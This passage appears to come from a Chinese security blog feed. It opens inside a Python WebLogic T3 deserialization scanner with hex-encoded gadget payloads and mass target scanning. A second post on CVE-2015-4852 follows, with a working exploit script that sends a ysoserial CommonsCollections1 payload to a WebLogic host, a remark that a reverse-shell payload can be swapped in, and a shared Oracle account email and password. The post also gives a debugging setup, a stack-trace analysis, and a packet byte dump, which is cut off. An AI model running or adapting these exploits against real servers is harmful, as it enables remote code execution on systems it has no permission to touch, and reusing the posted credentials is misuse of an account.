0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e727077010078737d00000001001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c61746573787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d626
57256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c77080000001000000001740008663561356136303871007e0009787672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c617465730000000000000000000000787078',
    'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078',
    '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',
    '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',
    ]
VER_SIG=['weblogic.jms.common.StreamMessageImpl',
    'org.apache.commons.collections.functors.InvokerTransformer',
    '\$Proxy[0-9]+',
    '\$Proxy[0-9]+',
    'weblogic.jms.common.StreamMessageImpl'
    ]

def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print('[!]{}:{} handshake successful'.format(server_addr[0],server_addr[1]))

def buildT3RequestObject(dip,sock):
    data1 = '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'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print('[!]{} send request payload successful,recv length:{}'.format(dip,len(sock.recv(2048))))

def sendEvilObjData(sock,data):
    payload='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'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    res='NO_DATA'
    try:
        res=sock.recv(4096)
    except socket.timeout:
        pass
    # print res.encode('hex')
    return res

def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)&gt;0:
        print('[+]%s:%d vul %s'%(server_addr[0],server_addr[1],VUL[index]))
        return True
    else:
        print('[-]%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]))
        return False

def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
    sock.settimeout(60)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(dip,sock)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    checkVul(rs,server_addr,index)

def exp(target):
    dip,dport = target
    vuls = []
    for index in range(len(VUL)):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
            sock.settimeout(60)
            server_addr = (dip, dport)
            t3handshake(sock,server_addr)
            buildT3RequestObject(dip,sock)
            rs=sendEvilObjData(sock,PAYLOAD[index])
            if checkVul(rs,server_addr,index):
                vuls.append(VUL[index])
        except Exception as e:
            print('[-]{} fail:{}'.format(dip,str(e)))
    return {'ip':dip,'status':'ok' if len(vuls)&gt;0 else 'fail','vuls':vuls}

def load_target_from_file(filename,port):
    iplist = []
    with open(filename) as f:
        for line in f:
            ip = line.strip()
            if len(ip)&gt;0:
                iplist.append((ip,port))
    return iplist

def process_result(results):
    results_ok = []
    results_fail = []
    for r in results:
        if r['status'] == 'ok':
            results_ok.append('{}:{}'.format(r['ip'],','.join(r['vuls'])))
        else:
            results_fail.append(r['ip'])
    print('[+]vuls total:{}n{}'.format(len(results_ok), 'n'.join(results_ok)))

def main():
    parser = argparse.ArgumentParser(description='weblogic scanner')
    parser.add_argument('-f','--file',default=None,help='read target ip from file')
    parser.add_argument('-t','--target',default=None,help='target ip')
    parser.add_argument('-p','--port',default='7001',help=' server port,default is 7001')

    args = parser.parse_args()
    if not args.file is None:
        iplist = load_target_from_file(args.file,int(args.port))
        pool = Pool(10)
        results = pool.map(exp,iplist)
        pool.close()
        pool.join()
        process_result(results)
    elif not args.target is None:
        exp((args.target,int(args.port)))
    else:
        parser.print_help()
        print('You must set target ip or file!')

if __name__=="__main__":
    main()
</code></pre>
<h2>参考链接</h2>
<p>https://www.cnblogs.com/afanti/p/10240217.html<br />
https://5alt.me/2018/04/weblogic%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8E%E8%B0%83%E8%AF%95/<br />
https://github.com/5up3rc/weblogic_cmd<br />
https://paper.seebug.org/584/<br />
https://github.com/pwntester/SerialKillerBypassGadgetCollection/blob/master/src/main/java/serialkiller/bypass/Weblogic1.java<br />
https://xz.aliyun.com/t/1825/#toc-2</p>
<p>以下是关于CVE-2015-4852的补丁信息<br />
https://www.oracle.com/security-alerts/alert-cve-2015-4852.html<br />
https://updates.oracle.com/Orion/PatchDetails/process_form?aru=19496800&#038;patch_password=&#038;no_header=0<br />
https://blog.csdn.net/zhouleiblog/article/details/50454925</p>
<p>Oracle的补丁季度更新报告<br />
https://www.oracle.com/security-alerts/cpuapr2016v3.html#AppendixFMW<br />
https://www.oracle.com/security-alerts/#CriticalPatchUpdates</p>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>CVE-2015-4852 Weblogic 反序列化RCE分析</title>
		<link>/audit/1151.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 30 Jan 2020 09:44:54 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[weblogic]]></category>
		<category><![CDATA[反序列化]]></category>
		<category><![CDATA[命令执行]]></category>
		<guid isPermaLink="false">/?p=1151</guid>

					<description><![CDATA[common-collections导致的反序列化RCE，闲着也是闲着，分析下。 环境 centos7 weblogic10.3.6 win10 idea 安装出现的问题 下载需要...]]></description>
										<content:encoded><![CDATA[<p>common-collections导致的<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>RCE，闲着也是闲着，分析下。</p>
<h1>环境</h1>
<p>centos7 <span class="wpcom_tag_link"><a href="/tags/weblogic" title="weblogic" target="_blank">weblogic</a></span>10.3.6 win10 idea</p>
<h1>安装出现的问题</h1>
<p>下载需要Oracle账户，网上百度了一个</p>
<pre><code class="">2696671285@qq.com
密码：Oracle123
</code></pre>
<pre><code class="">-bash: ./oepe-wls-indigo-installer-11.1.1.8.0.201110211138-10.3.6-linux32.bin: /lib/ld-linux.so.2: bad ELF interpreter: 没有那个文件或目录
</code></pre>
<p>解决</p>
<pre><code class="">yum install zlib.i686 -y
</code></pre>
<p>可以图形化安装，也可以命令行静默安装，推荐还是图形化安装，或者docker也行。</p>
<h1>复现</h1>
<p><img src="https://y4er.com/img/uploads/20200130161039.png" alt="20200130161039" /></p>
<p>利用脚本如下</p>
<pre><code class="language-python ">#!/usr/bin/env python
# coding: utf-8

import socket
import struct

def exp(host, port):

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_address = (host, int(port))
    data = ""
    try:
        sock.connect(server_address)
        # Send headers
        headers = 't3 12.2.1nAS:255nHL:19nn'.format(port)
        sock.sendall(headers)
        data = sock.recv(2)
        # java -jar ysoserial.jar CommonsCollections1 "touch /tmp/exp" &gt; ./tmp
        f = open('./tmp', 'rb')
        payload_obj = f.read()
        f.close()
        payload1 = "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".decode('hex')
        payload3 = "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".decode('hex')
        payload2 = payload_obj
        payload = payload1 + payload2 + payload3

        payload = struct.pack('&gt;I', len(payload)) + payload[4:]

        sock.send(payload)
        data = sock.recv(4096)
    except socket.error as e:
        print (u'socket 连接异常！')
    finally:
        sock.close()

exp('172.16.2.129', 7001)
</code></pre>
<p>利用成功会创建 /tmp/exp 文件，可以把poc改为反弹shell的payload。</p>
<h1>远程调试</h1>
<p>修改 <code>/root/Oracle/Middleware/user_projects/domains/base_domain/bin/setDomainEnv.sh</code> 在上方加入两行debug配置</p>
<p><img src="/wp-content/uploads/2020/01/20200130161119.png" alt="20200130161119" /></p>
<pre><code class="">debugFlag="true"
export debugFlag
</code></pre>
<p>打开idea，创建一个Java web工程，从Linux中把 <code>/root/Oracle/Middleware/modules</code>目录拷出来，在idea中File->Project Structure里找到Libraries，添加modules。<br />
<img src="/wp-content/uploads/2020/01/20200130161135.png" alt="20200130161135" /><br />
然后配置远程调试，填写远程IP以及端口。<br />
<img src="/wp-content/uploads/2020/01/20200130161150.png" alt="20200130161150" /></p>
<p><img src="/wp-content/uploads/2020/01/20200130161205.png" alt="20200130161205" /></p>
<p>重新启动weblogic<br />
<img src="/wp-content/uploads/2020/01/20200130161231.png" alt="20200130161231" /></p>
<p>因为我们知道是 commons-collections的InvokerTransformer出现的问题，所以断点直接下在transform()，开启idea的debug，然后用exp打过去，发现断点已经成功。<br />
<img src="/wp-content/uploads/2020/01/20200130161306.png" alt="20200130161306" /></p>
<h1>漏洞分析</h1>
<p>先上堆栈调用链</p>
<pre><code class="">transform:123, InvokerTransformer (org.apache.commons.collections.functors)
transform:122, ChainedTransformer (org.apache.commons.collections.functors)
get:157, LazyMap (org.apache.commons.collections.map)
invoke:50, AnnotationInvocationHandler (sun.reflect.annotation)
entrySet:-1, $Proxy57
readObject:327, AnnotationInvocationHandler (sun.reflect.annotation)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:39, NativeMethodAccessorImpl (sun.reflect)
invoke:25, DelegatingMethodAccessorImpl (sun.reflect)
invoke:597, Method (java.lang.reflect)
invokeReadObject:974, ObjectStreamClass (java.io)
readSerialData:1848, ObjectInputStream (java.io)
readOrdinaryObject:1752, ObjectInputStream (java.io)
readObject0:1328, ObjectInputStream (java.io)
readObject:350, ObjectInputStream (java.io)
readObject:66, InboundMsgAbbrev (weblogic.rjvm)
read:38, InboundMsgAbbrev (weblogic.rjvm)
readMsgAbbrevs:283, MsgAbbrevJVMConnection (weblogic.rjvm)
init:213, MsgAbbrevInputStream (weblogic.rjvm)
dispatch:498, MsgAbbrevJVMConnection (weblogic.rjvm)
dispatch:330, MuxableSocketT3 (weblogic.rjvm.t3)
dispatch:387, BaseAbstractMuxableSocket (weblogic.socket)
readReadySocketOnce:967, SocketMuxer (weblogic.socket)
readReadySocket:899, SocketMuxer (weblogic.socket)
processSockets:130, PosixSocketMuxer (weblogic.socket)
run:29, SocketReaderRequest (weblogic.socket)
execute:42, SocketReaderRequest (weblogic.socket)
execute:145, ExecuteThread (weblogic.kernel)
run:117, ExecuteThread (weblogic.kernel)
</code></pre>
<p>可以看到调用链的后半部分（即堆栈顶部的几帧）是commons-collections的反序列化链<br />
<img src="/wp-content/uploads/2020/01/20200130161406.png" alt="20200130161406" /></p>
<p>weblogic中确实用到了这个东西，现在就需要找反序列化的入口，就需要用到weblogic的T3协议了。</p>
<p><code>./Oracle/Middleware/user_projects/domains/base_domain/bin/stopWebLogic.sh</code> 这个脚本用来关闭weblogic服务，其中使用了 <code>t3://</code> 协议。<br />
<img src="/wp-content/uploads/2020/01/20200130161435.png" alt="20200130161435" /><br />
为了研究这个t3协议到底是个什么东西，我用tcpdump监听，然后运行脚本抓到了t3协议的流量。</p>
<pre><code class="">tcpdump -i any -w dump.pcap
</code></pre>
<p>然后发现t3协议中传输了序列化对象，我们知道<code>ac ed 00 05</code>是Java序列化流的魔数（magic header），据此过滤下<br />
<img src="/wp-content/uploads/2020/01/20200130161506.png" alt="20200130161506" /><br />
追踪下tcp流<br />
<img src="/wp-content/uploads/2020/01/20200130161527.png" alt="20200130161527" /></p>
<p>hex转储下，发现确实存在序列化数据。<br />
<img src="/wp-content/uploads/2020/01/20200130161545.png" alt="20200130161545" /></p>
<p>所以我们可以根据t3协议来构造恶意数据进而利用common-collections的反序列化链达到<span class="wpcom_tag_link"><a href="/tags/rce" title="rce" target="_blank">rce</a></span>的目的。</p>
<p>接下来就是怎么去构造t3协议数据包？</p>
<p>先来分析下t3协议的数据流，首先是第一个数据包发送了<code>t3 10.3.6\nAS:255\nHL:19\n\n</code>（<code>\n</code>为换行符），然后服务端回复了一个HELO信息<br />
<img src="/wp-content/uploads/2020/01/20200130161651.png" alt="20200130161651" /></p>
<p>前人经验：使用<code>t3 9.2.0\nAS:255\nHL:19\n\n</code>字符串（<code>\n</code>为换行符）作为T3的协议头发送给weblogic9、weblogic10g、weblogic11g、weblogic12c均合法。</p>
<p>再来看第二个数据包，将数据流转为C数组<br />
<img src="/wp-content/uploads/2020/01/20200130161707.png" alt="20200130161707" /></p>
<p>复制第二块红色的，代表是第二个请求包。编写Java代码来分析。</p>
<pre><code class="language-java ">package com.test.index;

import java.util.ArrayList;
import java.util.Base64;
import java.io.InputStream;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.io.OptionalDataException;
import java.io.StreamCorruptedException;
import java.util.Arrays;
import java.util.List;

public class DecodeObject {
    public static void main(String args[]) throws Exception {

        byte bytes[] = { /* Packet 388 */
                (byte) 0x00, (byte) 0x00, (byte) 0x05, (byte) (byte) 0xba, (byte) 0x01, (byte) 0x65, (byte) 0x01, (byte) 0xff,
                (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x00,
                (byte) 0x00, (byte) 0x00, (byte) 0x69, (byte) 0x00, (byte) 0x00, (byte) 0xea, (byte) 0x60, (byte) 0x00,
                (byte) 0x00, (byte) 0x00, (byte) 0x18, (byte) 0x05, (byte) 0x08, (byte) 0x4b, (byte) 0xa0, (byte) 0xb4,
                (byte) 0x79, (byte) 0xc0, (byte) 0xd5, (byte) 0x5b, (byte) 0x2a, (byte) 0x27, (byte) 0x86, (byte) 0x3d,
                (byte) 0x71, (byte) 0xf7, (byte) 0x37, (byte) 0xef, (byte) 0xcc, (byte) 0x99, (byte) 0x32, (byte) 0x23,
                (byte) 0x9e, (byte) 0x4b, (byte) 0x75, (byte) 0x02, (byte) 0x79, (byte) 0x73, (byte) 0x72, (byte) 0x00,
                (byte) 0x78, (byte) 0x72, (byte) 0x01, (byte) 0x78, (byte) 0x72, (byte) 0x02, (byte) 0x78, (byte) 0x70,
                (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x0a, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x03,
                (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x06,
                (byte) 0x00, (byte) 0x70, (byte) 0x70, (byte) 0x70, (byte) 0x70, (byte) 0x70, (byte) 0x70, (byte) 0x00,
                (byte) 0x00, (byte) 0x00, (byte) 0x0a, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x03, (byte) 0x00,
                (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x06, (byte) 0x00,
                (byte) 0x70, (byte) 0x06, (byte) 0xfe, (byte) 0x01, (byte) 0x00, (byte) 0x00, (byte) 0xac, (byte) 0xed,
                (byte) 0x00, (byte) 0x05, (byte) 0x73, (byte) 0x72, (byte) 0x00, (byte) 0x1d, (byte) 0x77, (byte) 0x65,
                (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x72,
                (byte) 0x6a, (byte) 0x76, (byte) 0x6d, (byte) 0x2e, (byte) 0x43, (byte) 0x6c, (byte) 0x61, (byte) 0x73,
                (byte) 0x73, (byte) 0x54, (byte) 0x61, (byte) 0x62, (byte) 0x6c, (byte) 0x65, (byte) 0x45, (byte) 0x6e,
                (byte) 0x74, (byte) 0x72, (byte) 0x79, (byte) 0x2f, (byte) 0x52, (byte) 0x65, (byte) 0x81, (byte) 0x57,
                (byte) 0xf4, (byte) 0xf9, (byte) 0xed, (byte) 0x0c, (byte) 0x00, (byte) 0x00, (byte) 0x78, (byte) 0x70,
                (byte) 0x72, (byte) 0x00, (byte) 0x24, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f,
                (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x63, (byte) 0x6f, (byte) 0x6d, (byte) 0x6d,
                (byte) 0x6f, (byte) 0x6e, (byte) 0x2e, (byte) 0x69, (byte) 0x6e, (byte) 0x74, (byte) 0x65, (byte) 0x72,
                (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2e, (byte) 0x50, (byte) 0x61, (byte) 0x63, (byte) 0x6b,
                (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x49, (byte) 0x6e, (byte) 0x66, (byte) 0x6f, (byte) 0xe6,
                (byte) 0xf7, (byte) 0x23, (byte) 0xe7, (byte) 0xb8, (byte) 0xae, (byte) 0x1e, (byte) 0xc9, (byte) 0x02,
                (byte) 0x00, (byte) 0x08, (byte) 0x49, (byte) 0x00, (byte) 0x05, (byte) 0x6d, (byte) 0x61, (byte) 0x6a,
                (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x05, (byte) 0x6d, (byte) 0x69, (byte) 0x6e,
                (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x0c, (byte) 0x72, (byte) 0x6f, (byte) 0x6c,
                (byte) 0x6c, (byte) 0x69, (byte) 0x6e, (byte) 0x67, (byte) 0x50, (byte) 0x61, (byte) 0x74, (byte) 0x63,
                (byte) 0x68, (byte) 0x49, (byte) 0x00, (byte) 0x0b, (byte) 0x73, (byte) 0x65, (byte) 0x72, (byte) 0x76,
                (byte) 0x69, (byte) 0x63, (byte) 0x65, (byte) 0x50, (byte) 0x61, (byte) 0x63, (byte) 0x6b, (byte) 0x5a,
                (byte) 0x00, (byte) 0x0e, (byte) 0x74, (byte) 0x65, (byte) 0x6d, (byte) 0x70, (byte) 0x6f, (byte) 0x72,
                (byte) 0x61, (byte) 0x72, (byte) 0x79, (byte) 0x50, (byte) 0x61, (byte) 0x74, (byte) 0x63, (byte) 0x68,
                (byte) 0x4c, (byte) 0x00, (byte) 0x09, (byte) 0x69, (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x54,
                (byte) 0x69, (byte) 0x74, (byte) 0x6c, (byte) 0x65, (byte) 0x74, (byte) 0x00, (byte) 0x12, (byte) 0x4c,
                (byte) 0x6a, (byte) 0x61, (byte) 0x76, (byte) 0x61, (byte) 0x2f, (byte) 0x6c, (byte) 0x61, (byte) 0x6e,
                (byte) 0x67, (byte) 0x2f, (byte) 0x53, (byte) 0x74, (byte) 0x72, (byte) 0x69, (byte) 0x6e, (byte) 0x67,
                (byte) 0x3b, (byte) 0x4c, (byte) 0x00, (byte) 0x0a, (byte) 0x69, (byte) 0x6d, (byte) 0x70, (byte) 0x6c,
                (byte) 0x56, (byte) 0x65, (byte) 0x6e, (byte) 0x64, (byte) 0x6f, (byte) 0x72, (byte) 0x71, (byte) 0x00,
                (byte) 0x7e, (byte) 0x00, (byte) 0x03, (byte) 0x4c, (byte) 0x00, (byte) 0x0b, (byte) 0x69, (byte) 0x6d,
                (byte) 0x70, (byte) 0x6c, (byte) 0x56, (byte) 0x65, (byte) 0x72, (byte) 0x73, (byte) 0x69, (byte) 0x6f,
                (byte) 0x6e, (byte) 0x71, (byte) 0x00, (byte) 0x7e, (byte) 0x00, (byte) 0x03, (byte) 0x78, (byte) 0x70,
                (byte) 0x77, (byte) 0x02, (byte) 0x00, (byte) 0x00, (byte) 0x78, (byte) 0xfe, (byte) 0x01, (byte) 0x00,
                (byte) 0x00, (byte) 0xac, (byte) 0xed, (byte) 0x00, (byte) 0x05, (byte) 0x73, (byte) 0x72, (byte) 0x00,
                (byte) 0x1d, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69,
                (byte) 0x63, (byte) 0x2e, (byte) 0x72, (byte) 0x6a, (byte) 0x76, (byte) 0x6d, (byte) 0x2e, (byte) 0x43,
                (byte) 0x6c, (byte) 0x61, (byte) 0x73, (byte) 0x73, (byte) 0x54, (byte) 0x61, (byte) 0x62, (byte) 0x6c,
                (byte) 0x65, (byte) 0x45, (byte) 0x6e, (byte) 0x74, (byte) 0x72, (byte) 0x79, (byte) 0x2f, (byte) 0x52,
                (byte) 0x65, (byte) 0x81, (byte) 0x57, (byte) 0xf4, (byte) 0xf9, (byte) 0xed, (byte) 0x0c, (byte) 0x00,
                (byte) 0x00, (byte) 0x78, (byte) 0x70, (byte) 0x72, (byte) 0x00, (byte) 0x24, (byte) 0x77, (byte) 0x65,
                (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x63,
                (byte) 0x6f, (byte) 0x6d, (byte) 0x6d, (byte) 0x6f, (byte) 0x6e, (byte) 0x2e, (byte) 0x69, (byte) 0x6e,
                (byte) 0x74, (byte) 0x65, (byte) 0x72, (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2e, (byte) 0x56,
                (byte) 0x65, (byte) 0x72, (byte) 0x73, (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x49, (byte) 0x6e,
                (byte) 0x66, (byte) 0x6f, (byte) 0x97, (byte) 0x22, (byte) 0x45, (byte) 0x51, (byte) 0x64, (byte) 0x52,
                (byte) 0x46, (byte) 0x3e, (byte) 0x02, (byte) 0x00, (byte) 0x03, (byte) 0x5b, (byte) 0x00, (byte) 0x08,
                (byte) 0x70, (byte) 0x61, (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x73,
                (byte) 0x74, (byte) 0x00, (byte) 0x27, (byte) 0x5b, (byte) 0x4c, (byte) 0x77, (byte) 0x65, (byte) 0x62,
                (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2f, (byte) 0x63, (byte) 0x6f,
                (byte) 0x6d, (byte) 0x6d, (byte) 0x6f, (byte) 0x6e, (byte) 0x2f, (byte) 0x69, (byte) 0x6e, (byte) 0x74,
                (byte) 0x65, (byte) 0x72, (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2f, (byte) 0x50, (byte) 0x61,
                (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x49, (byte) 0x6e, (byte) 0x66,
                (byte) 0x6f, (byte) 0x3b, (byte) 0x4c, (byte) 0x00, (byte) 0x0e, (byte) 0x72, (byte) 0x65, (byte) 0x6c,
                (byte) 0x65, (byte) 0x61, (byte) 0x73, (byte) 0x65, (byte) 0x56, (byte) 0x65, (byte) 0x72, (byte) 0x73,
                (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x74, (byte) 0x00, (byte) 0x12, (byte) 0x4c, (byte) 0x6a,
                (byte) 0x61, (byte) 0x76, (byte) 0x61, (byte) 0x2f, (byte) 0x6c, (byte) 0x61, (byte) 0x6e, (byte) 0x67,
                (byte) 0x2f, (byte) 0x53, (byte) 0x74, (byte) 0x72, (byte) 0x69, (byte) 0x6e, (byte) 0x67, (byte) 0x3b,
                (byte) 0x5b, (byte) 0x00, (byte) 0x12, (byte) 0x76, (byte) 0x65, (byte) 0x72, (byte) 0x73, (byte) 0x69,
                (byte) 0x6f, (byte) 0x6e, (byte) 0x49, (byte) 0x6e, (byte) 0x66, (byte) 0x6f, (byte) 0x41, (byte) 0x73,
                (byte) 0x42, (byte) 0x79, (byte) 0x74, (byte) 0x65, (byte) 0x73, (byte) 0x74, (byte) 0x00, (byte) 0x02,
                (byte) 0x5b, (byte) 0x42, (byte) 0x78, (byte) 0x72, (byte) 0x00, (byte) 0x24, (byte) 0x77, (byte) 0x65,
                (byte) 0x62, (byte) 0x6c, (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x63,
                (byte) 0x6f, (byte) 0x6d, (byte) 0x6d, (byte) 0x6f, (byte) 0x6e, (byte) 0x2e, (byte) 0x69, (byte) 0x6e,
                (byte) 0x74, (byte) 0x65, (byte) 0x72, (byte) 0x6e, (byte) 0x61, (byte) 0x6c, (byte) 0x2e, (byte) 0x50,
                (byte) 0x61, (byte) 0x63, (byte) 0x6b, (byte) 0x61, (byte) 0x67, (byte) 0x65, (byte) 0x49, (byte) 0x6e,
                (byte) 0x66, (byte) 0x6f, (byte) 0xe6, (byte) 0xf7, (byte) 0x23, (byte) 0xe7, (byte) 0xb8, (byte) 0xae,
                (byte) 0x1e, (byte) 0xc9, (byte) 0x02, (byte) 0x00, (byte) 0x08, (byte) 0x49, (byte) 0x00, (byte) 0x05,
                (byte) 0x6d, (byte) 0x61, (byte) 0x6a, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x05,
                (byte) 0x6d, (byte) 0x69, (byte) 0x6e, (byte) 0x6f, (byte) 0x72, (byte) 0x49, (byte) 0x00, (byte) 0x0c,
                (byte) 0x72, (byte) 0x6f, (byte) 0x6c, (byte) 0x6c, (byte) 0x69, (byte) 0x6e, (byte) 0x67, (byte) 0x50,
                (byte) 0x61, (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x49, (byte) 0x00, (byte) 0x0b, (byte) 0x73,
                (byte) 0x65, (byte) 0x72, (byte) 0x76, (byte) 0x69, (byte) 0x63, (byte) 0x65, (byte) 0x50, (byte) 0x61,
                (byte) 0x63, (byte) 0x6b, (byte) 0x5a, (byte) 0x00, (byte) 0x0e, (byte) 0x74, (byte) 0x65, (byte) 0x6d,
                (byte) 0x70, (byte) 0x6f, (byte) 0x72, (byte) 0x61, (byte) 0x72, (byte) 0x79, (byte) 0x50, (byte) 0x61,
                (byte) 0x74, (byte) 0x63, (byte) 0x68, (byte) 0x4c, (byte) 0x00, (byte) 0x09, (byte) 0x69, (byte) 0x6d,
                (byte) 0x70, (byte) 0x6c, (byte) 0x54, (byte) 0x69, (byte) 0x74, (byte) 0x6c, (byte) 0x65, (byte) 0x71,
                (byte) 0x00, (byte) 0x7e, (byte) 0x00, (byte) 0x04, (byte) 0x4c, (byte) 0x00, (byte) 0x0a, (byte) 0x69,
                (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x56, (byte) 0x65, (byte) 0x6e, (byte) 0x64, (byte) 0x6f,
                (byte) 0x72, (byte) 0x71, (byte) 0x00, (byte) 0x7e, (byte) 0x00, (byte) 0x04, (byte) 0x4c, (byte) 0x00,
                (byte) 0x0b, (byte) 0x69, (byte) 0x6d, (byte) 0x70, (byte) 0x6c, (byte) 0x56, (byte) 0x65, (byte) 0x72,
                (byte) 0x73, (byte) 0x69, (byte) 0x6f, (byte) 0x6e, (byte) 0x71, (byte) 0x00, (byte) 0x7e, (byte) 0x00,
                (byte) 0x04, (byte) 0x78, (byte) 0x70, (byte) 0x77, (byte) 0x02, (byte) 0x00, (byte) 0x00, (byte) 0x78,
                (byte) 0xfe, (byte) 0x01, (byte) 0x00, (byte) 0x00, (byte) 0xac, (byte) 0xed, (byte) 0x00, (byte) 0x05,
                (byte) 0x73, (byte) 0x72, (byte) 0x00, (byte) 0x1d, (byte) 0x77, (byte) 0x65, (byte) 0x62, (byte) 0x6c,
                (byte) 0x6f, (byte) 0x67, (byte) 0x69, (byte) 0x63, (byte) 0x2e, (byte) 0x72, (byte) 0x6a, (byte) 0x76,
